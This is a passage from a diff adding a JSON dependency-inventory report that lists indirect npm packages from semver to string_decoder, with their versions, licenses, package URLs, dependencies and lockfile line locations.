18660, + "EndLine": 18671 + }, + { + "StartLine": 18704, + "EndLine": 18715 + }, + { + "StartLine": 19489, + "EndLine": 19500 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "semver@7.7.4", + "Name": "semver", + "Identifier": { + "PURL": "pkg:npm/semver@7.7.4", + "UID": "d19d7c6aaaecc186" + }, + "Version": "7.7.4", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 18316, + "EndLine": 18327 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "send@0.19.0", + "Name": "send", + "Identifier": { + "PURL": "pkg:npm/send@0.19.0", + "UID": "21a5dff31d1828e9" + }, + "Version": "0.19.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "debug@2.6.9", + "depd@2.0.0", + "destroy@1.2.0", + "encodeurl@1.0.2", + "escape-html@1.0.3", + "etag@1.8.1", + "fresh@0.5.2", + "http-errors@2.0.0", + "mime@1.6.0", + "ms@2.1.3", + "on-finished@2.4.1", + "range-parser@1.2.1", + "statuses@2.0.1" + ], + "Locations": [ + { + "StartLine": 19300, + "EndLine": 19323 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "serialize-error@2.1.0", + "Name": "serialize-error", + "Identifier": { + "PURL": "pkg:npm/serialize-error@2.1.0", + "UID": "364acc6cf7cf786a" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19360, + "EndLine": 19368 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "serve-static@1.16.2", + "Name": "serve-static", + "Identifier": { + "PURL": "pkg:npm/serve-static@1.16.2", + "UID": "7f32842a6733ad98" + }, + "Version": "1.16.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "encodeurl@2.0.0", + "escape-html@1.0.3", + "parseurl@1.3.3", + "send@0.19.0" + ], + "Locations": [ + { + "StartLine": 19369, + "EndLine": 19383 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "set-blocking@2.0.0", + "Name": "set-blocking", + "Identifier": { + "PURL": "pkg:npm/set-blocking@2.0.0", + "UID": "f0f37a20d4225b89" + }, + "Version": "2.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19393, + "EndLine": 19398 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "set-function-length@1.2.2", + "Name": "set-function-length", + "Identifier": { + "PURL": "pkg:npm/set-function-length@1.2.2", + "UID": "620438fd673cb85e" + }, + "Version": "1.2.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "define-data-property@1.1.4", + "es-errors@1.3.0", + "function-bind@1.1.2", + "get-intrinsic@1.3.0", + "gopd@1.2.0", + "has-property-descriptors@1.0.2" + ], + "Locations": [ + { + "StartLine": 19399, + "EndLine": 19415 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "setimmediate@1.0.5", + "Name": "setimmediate", + "Identifier": { + "PURL": "pkg:npm/setimmediate@1.0.5", + "UID": "7bfaf99125bcf316" + }, + "Version": "1.0.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19447, + "EndLine": 19452 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "setprototypeof@1.2.0", + "Name": "setprototypeof", + "Identifier": { + "PURL": "pkg:npm/setprototypeof@1.2.0", + "UID": "5f985c5811f4e42a" + }, + "Version": "1.2.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19453, + "EndLine": 19458 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "sha1-file@1.0.4", + "Name": "sha1-file", + "Identifier": { + "PURL": "pkg:npm/sha1-file@1.0.4", + "UID": "dd317e0ae1d448b0" + }, + "Version": "1.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19459, + "EndLine": 19465 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "sharp@0.32.6", + "Name": "sharp", + "Identifier": { + "PURL": "pkg:npm/sharp@0.32.6", + "UID": "4172236144483a3" + }, + "Version": "0.32.6", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "color@4.2.3", + "detect-libc@2.1.2", + "node-addon-api@6.1.0", + "prebuild-install@7.1.3", + "semver@7.7.3", + "simple-get@4.0.1", + "tar-fs@3.1.1", + "tunnel-agent@0.6.0" + ], + "Locations": [ + { + "StartLine": 19466, + "EndLine": 19488 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "shebang-command@2.0.0", + "Name": "shebang-command", + "Identifier": { + "PURL": "pkg:npm/shebang-command@2.0.0", + "UID": "23d5297f88a3dd86" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "shebang-regex@3.0.0" + ], + "Locations": [ + { + "StartLine": 15462, + "EndLine": 15474 + }, + { + "StartLine": 19501, + "EndLine": 19512 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "shebang-regex@3.0.0", + "Name": "shebang-regex", + "Identifier": { + "PURL": "pkg:npm/shebang-regex@3.0.0", + "UID": "791554a4e712ef27" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 15475, + "EndLine": 15484 + }, + { + "StartLine": 19513, + "EndLine": 19521 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "shell-quote@1.8.3", + "Name": "shell-quote", + "Identifier": { + "PURL": "pkg:npm/shell-quote@1.8.3", + "UID": "84ebbd8a7228facc" + }, + "Version": "1.8.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19522, + "EndLine": 19533 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "side-channel@1.1.0", + "Name": "side-channel", + "Identifier": { + "PURL": "pkg:npm/side-channel@1.1.0", + "UID": "ade966b75fcdf977" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "es-errors@1.3.0", + "object-inspect@1.13.4", + "side-channel-list@1.0.0", + "side-channel-map@1.0.1", + "side-channel-weakmap@1.0.2" + ], + "Locations": [ + { + "StartLine": 19534, + "EndLine": 19553 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "side-channel-list@1.0.0", + "Name": "side-channel-list", + "Identifier": { + "PURL": "pkg:npm/side-channel-list@1.0.0", + "UID": "908f75051506867c" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "es-errors@1.3.0", + "object-inspect@1.13.4" + ], + "Locations": [ + { + "StartLine": 19554, + "EndLine": 19570 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "side-channel-map@1.0.1", + "Name": "side-channel-map", + "Identifier": { + "PURL": "pkg:npm/side-channel-map@1.0.1", + "UID": "39b4966b9b1b8dcc" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "call-bound@1.0.4", + "es-errors@1.3.0", + "get-intrinsic@1.3.0", + "object-inspect@1.13.4" + ], + "Locations": [ + { + "StartLine": 19571, + "EndLine": 19589 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "side-channel-weakmap@1.0.2", + "Name": "side-channel-weakmap", + "Identifier": { + "PURL": "pkg:npm/side-channel-weakmap@1.0.2", + "UID": "6b57608feb3c2cac" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "call-bound@1.0.4", + "es-errors@1.3.0", + "get-intrinsic@1.3.0", + "object-inspect@1.13.4", + "side-channel-map@1.0.1" + ], + "Locations": [ + { + "StartLine": 19590, + "EndLine": 19609 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "signal-exit@3.0.7", + "Name": "signal-exit", + "Identifier": { + "PURL": "pkg:npm/signal-exit@3.0.7", + "UID": "f76d68f9b572d6bc" + }, + "Version": "3.0.7", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19610, + "EndLine": 19615 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "signal-exit@4.1.0", + "Name": "signal-exit", + "Identifier": { + "PURL": "pkg:npm/signal-exit@4.1.0", + "UID": "16b1ae66e5c43e9e" + }, + "Version": "4.1.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9444, + "EndLine": 9455 + }, + { + "StartLine": 15485, + "EndLine": 15497 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "sigstore@4.0.0", + "Name": "sigstore", + "Identifier": { + "PURL": "pkg:npm/sigstore@4.0.0", + "UID": "e449f3fa728ea2c1" + }, + "Version": "4.0.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@sigstore/bundle@4.0.0", + "@sigstore/core@3.0.0", + "@sigstore/protobuf-specs@0.5.0", + "@sigstore/sign@4.0.1", + "@sigstore/tuf@4.0.0", + "@sigstore/verify@3.0.0" + ], + "Locations": [ + { + "StartLine": 15498, + "EndLine": 15513 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "simple-concat@1.0.1", + "Name": "simple-concat", + "Identifier": { + "PURL": "pkg:npm/simple-concat@1.0.1", + "UID": "bfcdc21c02f2e0f6" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19616, + "EndLine": 19635 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "simple-get@4.0.1", + "Name": "simple-get", + "Identifier": { + "PURL": "pkg:npm/simple-get@4.0.1", + "UID": "be2782fb9477fd2c" + }, + "Version": "4.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "decompress-response@6.0.0", + "once@1.4.0", + "simple-concat@1.0.1" + ], + "Locations": [ + { + "StartLine": 19636, + "EndLine": 19660 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "simple-plist@1.3.1", + "Name": "simple-plist", + "Identifier": { + "PURL": "pkg:npm/simple-plist@1.3.1", + "UID": "f6fb13458162c500" + }, + "Version": "1.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "bplist-creator@0.1.0", + "bplist-parser@0.3.1", + "plist@3.1.0" + ], + "Locations": [ + { + "StartLine": 19661, + "EndLine": 19671 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "simple-swizzle@0.2.4", + "Name": "simple-swizzle", + "Identifier": { + "PURL": "pkg:npm/simple-swizzle@0.2.4", + "UID": "3fbf09706379576e" + }, + "Version": "0.2.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "is-arrayish@0.3.4" + ], + "Locations": [ + { + "StartLine": 19672, + "EndLine": 19680 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "sisteransi@1.0.5", + "Name": "sisteransi", + "Identifier": { + "PURL": "pkg:npm/sisteransi@1.0.5", + "UID": "e2511b6faea46d61" + }, + "Version": "1.0.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19687, + "EndLine": 19692 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "slash@3.0.0", + "Name": "slash", + "Identifier": { + "PURL": "pkg:npm/slash@3.0.0", + "UID": "288ef1c26aa031a7" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19693, + "EndLine": 19701 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "slice-ansi@2.1.0", + "Name": "slice-ansi", + "Identifier": { + "PURL": "pkg:npm/slice-ansi@2.1.0", + "UID": "de93c907c9b7b81e" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ansi-styles@3.2.1", + "astral-regex@1.0.0", + "is-fullwidth-code-point@2.0.0" + ], + "Locations": [ + { + "StartLine": 19702, + "EndLine": 19716 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "slugify@1.6.6", + "Name": "slugify", + "Identifier": { + "PURL": "pkg:npm/slugify@1.6.6", + "UID": "589f6082ee882935" + }, + "Version": "1.6.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19747, + "EndLine": 19755 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "smart-buffer@4.2.0", + "Name": "smart-buffer", + "Identifier": { + "PURL": "pkg:npm/smart-buffer@4.2.0", + "UID": "932509962beee2d0" + }, + "Version": "4.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 15514, + "EndLine": 15524 + }, + { + "StartLine": 19756, + "EndLine": 19766 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "snake-case@3.0.4", + "Name": "snake-case", + "Identifier": { + "PURL": "pkg:npm/snake-case@3.0.4", + "UID": "cf7b71fa8562195e" + }, + "Version": "3.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "dot-case@3.0.4", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 19767, + "EndLine": 19776 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "socks@2.8.7", + "Name": "socks", + "Identifier": { + "PURL": "pkg:npm/socks@2.8.7", + "UID": "ba3cfd665ff2a760" + }, + "Version": "2.8.7", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ip-address@10.0.1", + "smart-buffer@4.2.0" + ], + "Locations": [ + { + "StartLine": 15525, + "EndLine": 15539 + }, + { + "StartLine": 19783, + "EndLine": 19797 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "socks-proxy-agent@6.2.1", + "Name": "socks-proxy-agent", + "Identifier": { + "PURL": "pkg:npm/socks-proxy-agent@6.2.1", + "UID": "1d6eb1d30dd7c41d" + }, + "Version": "6.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "agent-base@6.0.2", + "debug@4.4.3", + "socks@2.8.7" + ], + "Locations": [ + { + "StartLine": 19798, + "EndLine": 19812 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "socks-proxy-agent@8.0.5", + "Name": "socks-proxy-agent", + "Identifier": { + "PURL": "pkg:npm/socks-proxy-agent@8.0.5", + "UID": "9cb617e3df1c64f2" + }, + "Version": "8.0.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "agent-base@7.1.4", + "debug@4.4.3", + "socks@2.8.7" + ], + "Locations": [ + { + "StartLine": 15540, + "EndLine": 15554 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "source-map@0.5.6", + "Name": "source-map", + "Identifier": { + "PURL": "pkg:npm/source-map@0.5.6", + "UID": "42b784e9d3ee1da2" + }, + "Version": "0.5.6", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20013, + "EndLine": 20021 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "source-map@0.5.7", + "Name": "source-map", + "Identifier": { + "PURL": "pkg:npm/source-map@0.5.7", + "UID": "a75f0ff3d6a788ab" + }, + "Version": "0.5.7", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 12613, + "EndLine": 12621 + }, + { + "StartLine": 12642, + "EndLine": 12650 + }, + { + "StartLine": 12713, + "EndLine": 12721 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "source-map@0.6.1", + "Name": "source-map", + "Identifier": { + "PURL": "pkg:npm/source-map@0.6.1", + "UID": "a9f804ce58430ce" + }, + "Version": "0.6.1", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19826, + "EndLine": 19834 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "source-map-js@1.2.1", + "Name": "source-map-js", + "Identifier": { + "PURL": "pkg:npm/source-map-js@1.2.1", + "UID": "56c034fae49afe66" + }, + "Version": "1.2.1", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19835, + "EndLine": 19843 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "source-map-support@0.5.21", + "Name": "source-map-support", + "Identifier": { + "PURL": "pkg:npm/source-map-support@0.5.21", + "UID": "24100f04fc71a8f1" + }, + "Version": "0.5.21", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "buffer-from@1.1.2", + "source-map@0.6.1" + ], + "Locations": [ + { + "StartLine": 20545, + "EndLine": 20554 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "spdx-correct@3.2.0", + "Name": "spdx-correct", + "Identifier": { + "PURL": "pkg:npm/spdx-correct@3.2.0", + "UID": "627ba2dae7519e8c" + }, + "Version": "3.2.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "spdx-expression-parse@3.0.1", + "spdx-license-ids@3.0.22" + ], + "Locations": [ + { + "StartLine": 15555, + "EndLine": 15565 + }, + { + "StartLine": 19855, + "EndLine": 19864 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "spdx-exceptions@2.5.0", + "Name": "spdx-exceptions", + "Identifier": { + "PURL": "pkg:npm/spdx-exceptions@2.5.0", + "UID": "8722b57c1d40e4ba" + }, + "Version": "2.5.0", + "Licenses": [ + "CC-BY-3.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 15575, + "EndLine": 15581 + }, + { + "StartLine": 19865, + "EndLine": 19870 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "spdx-expression-parse@3.0.1", + "Name": "spdx-expression-parse", + "Identifier": { + "PURL": "pkg:npm/spdx-expression-parse@3.0.1", + "UID": "828a918479c9625a" + }, + "Version": "3.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "spdx-exceptions@2.5.0", + "spdx-license-ids@3.0.22" + ], + "Locations": [ + { + "StartLine": 15566, + "EndLine": 15574 + }, + { + "StartLine": 15826, + "EndLine": 15834 + }, + { + "StartLine": 19871, + "EndLine": 19880 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "spdx-expression-parse@4.0.0", + "Name": "spdx-expression-parse", + "Identifier": { + "PURL": "pkg:npm/spdx-expression-parse@4.0.0", + "UID": "7efaf09360ffaef3" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "spdx-exceptions@2.5.0", + "spdx-license-ids@3.0.22" + ], + "Locations": [ + { + "StartLine": 15582, + "EndLine": 15592 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "spdx-license-ids@3.0.22", + "Name": "spdx-license-ids", + "Identifier": { + "PURL": "pkg:npm/spdx-license-ids@3.0.22", + "UID": "94fc45d82e776201" + }, + "Version": "3.0.22", + "Licenses": [ + "CC0-1.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 15593, + "EndLine": 15599 + }, + { + "StartLine": 19881, + "EndLine": 19886 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "split-on-first@1.1.0", + "Name": "split-on-first", + "Identifier": { + "PURL": "pkg:npm/split-on-first@1.1.0", + "UID": "433c63bd9d16c2ba" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19887, + "EndLine": 19895 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "sprintf-js@1.0.3", + "Name": "sprintf-js", + "Identifier": { + "PURL": "pkg:npm/sprintf-js@1.0.3", + "UID": "56fec2f14df69783" + }, + "Version": "1.0.3", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19896, + "EndLine": 19901 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "sqlite3@5.1.7", + "Name": "sqlite3", + "Identifier": { + "PURL": "pkg:npm/sqlite3@5.1.7", + "UID": "be5833085e5db3e5" + }, + "Version": "5.1.7", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "bindings@1.5.0", + "node-addon-api@7.1.1", + "node-gyp@8.4.1", + "prebuild-install@7.1.3", + "tar@6.2.1" + ], + "Locations": [ + { + "StartLine": 19902, + "EndLine": 19926 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ssri@12.0.0", + "Name": "ssri", + "Identifier": { + "PURL": "pkg:npm/ssri@12.0.0", + "UID": "d8e0000e6f54df6d" + }, + "Version": "12.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "minipass@7.1.2" + ], + "Locations": [ + { + "StartLine": 15600, + "EndLine": 15610 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ssri@8.0.1", + "Name": "ssri", + "Identifier": { + "PURL": "pkg:npm/ssri@8.0.1", + "UID": "e9eb9165d9385785" + }, + "Version": "8.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "minipass@3.3.6" + ], + "Locations": [ + { + "StartLine": 19934, + "EndLine": 19946 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "stack-generator@2.0.10", + "Name": "stack-generator", + "Identifier": { + "PURL": "pkg:npm/stack-generator@2.0.10", + "UID": "2eedcd03ba3648d4" + }, + "Version": "2.0.10", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "stackframe@1.3.4" + ], + "Locations": [ + { + "StartLine": 19967, + "EndLine": 19975 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "stack-utils@2.0.6", + "Name": "stack-utils", + "Identifier": { + "PURL": "pkg:npm/stack-utils@2.0.6", + "UID": "e623ac294bd25906" + }, + "Version": "2.0.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "escape-string-regexp@2.0.0" + ], + "Locations": [ + { + "StartLine": 19976, + "EndLine": 19987 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "stackframe@1.3.4", + "Name": "stackframe", + "Identifier": { + "PURL": "pkg:npm/stackframe@1.3.4", + "UID": "11debaa164eb78b4" + }, + "Version": "1.3.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19997, + "EndLine": 20002 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "stacktrace-gps@3.1.2", + "Name": "stacktrace-gps", + "Identifier": { + "PURL": "pkg:npm/stacktrace-gps@3.1.2", + "UID": "9e2ace3b24df2d7" + }, + "Version": "3.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "source-map@0.5.6", + "stackframe@1.3.4" + ], + "Locations": [ + { + "StartLine": 20003, + "EndLine": 20012 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "stacktrace-js@2.0.2", + "Name": "stacktrace-js", + "Identifier": { + "PURL": "pkg:npm/stacktrace-js@2.0.2", + "UID": "b8d8959a58ca8fab" + }, + "Version": "2.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "error-stack-parser@2.1.4", + "stack-generator@2.0.10", + "stacktrace-gps@3.1.2" + ], + "Locations": [ + { + "StartLine": 20022, + "EndLine": 20032 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "stacktrace-parser@0.1.11", + "Name": "stacktrace-parser", + "Identifier": { + "PURL": "pkg:npm/stacktrace-parser@0.1.11", + "UID": "57c77b887a092d6c" + }, + "Version": "0.1.11", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "type-fest@0.7.1" + ], + "Locations": [ + { + "StartLine": 20033, + "EndLine": 20044 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "statuses@1.5.0", + "Name": "statuses", + "Identifier": { + "PURL": "pkg:npm/statuses@1.5.0", + "UID": "2c4a072884a2d00c" + }, + "Version": "1.5.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20054, + "EndLine": 20062 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "statuses@2.0.1", + "Name": "statuses", + "Identifier": { + "PURL": "pkg:npm/statuses@2.0.1", + "UID": "8c0d3b3b7b25dd85" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10085, + "EndLine": 10093 + }, + { + "StartLine": 19351, + "EndLine": 19359 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "stream-buffers@2.2.0", + "Name": "stream-buffers", + "Identifier": { + "PURL": "pkg:npm/stream-buffers@2.2.0", + "UID": "e6bc8cff46600c5d" + }, + "Version": "2.2.0", + "Licenses": [ + "Unlicense" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20077, + "EndLine": 20085 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "streamx@2.23.0", + "Name": "streamx", + "Identifier": { + "PURL": "pkg:npm/streamx@2.23.0", + "UID": "4bae2a631ae10d44" + }, + "Version": "2.23.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "events-universal@1.0.1", + "fast-fifo@1.3.2", + "text-decoder@1.2.3" + ], + "Locations": [ + { + "StartLine": 20086, + "EndLine": 20096 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "strict-uri-encode@2.0.0", + "Name": "strict-uri-encode", + "Identifier": { + "PURL": "pkg:npm/strict-uri-encode@2.0.0", + "UID": "2959b56cd55d549f" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20097, + "EndLine": 20105 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "string-hash-64@1.0.3", + "Name": "string-hash-64", + "Identifier": { + "PURL": "pkg:npm/string-hash-64@1.0.3", + "UID": "38985737f9786942" + }, + "Version": "1.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20115, + "EndLine": 20120 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "string-width@1.0.2", + "Name": "string-width", + "Identifier": { + "PURL": "pkg:npm/string-width@1.0.2", + "UID": "df692d7a6094502f" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "code-point-at@1.1.0", + "is-fullwidth-code-point@1.0.0", + "strip-ansi@3.0.1" + ], + "Locations": [ + { + "StartLine": 17423, + "EndLine": 17436 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "string-width@4.2.3", + "Name": "string-width", + "Identifier": { + "PURL": "pkg:npm/string-width@4.2.3", + "UID": "7d4c6eef86c37927" + }, + "Version": "4.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "emoji-regex@8.0.0", + "is-fullwidth-code-point@3.0.0", + "strip-ansi@6.0.1" + ], + "Locations": [ + { + "StartLine": 15611, + "EndLine": 15625 + }, + { + "StartLine": 15626, + "EndLine": 15641 + }, + { + "StartLine": 20142, + "EndLine": 20155 + }, + { + "StartLine": 20156, + "EndLine": 20170 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "string-width@5.1.2", + "Name": "string-width", + "Identifier": { + "PURL": "pkg:npm/string-width@5.1.2", + "UID": "6e6714fbc8118895" + }, + "Version": "5.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "eastasianwidth@0.2.0", + "emoji-regex@9.2.2", + "strip-ansi@7.1.2" + ], + "Locations": [ + { + "StartLine": 3358, + "EndLine": 3374 + }, + { + "StartLine": 13586, + "EndLine": 13601 + }, + { + "StartLine": 15938, + "EndLine": 15953 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "string_decoder@1.1.1", + "Name": "string_decoder", + "Identifier": { + "PURL": "pkg:npm/string_decoder@1.1.1", + "UID": "50c199dc85fa7ec6" + }, + "Version": "1.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "safe-buffer@5.1.2" + ], + "Locations": [ + { + "StartLine": 17414, + "EndLine": 17422 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": 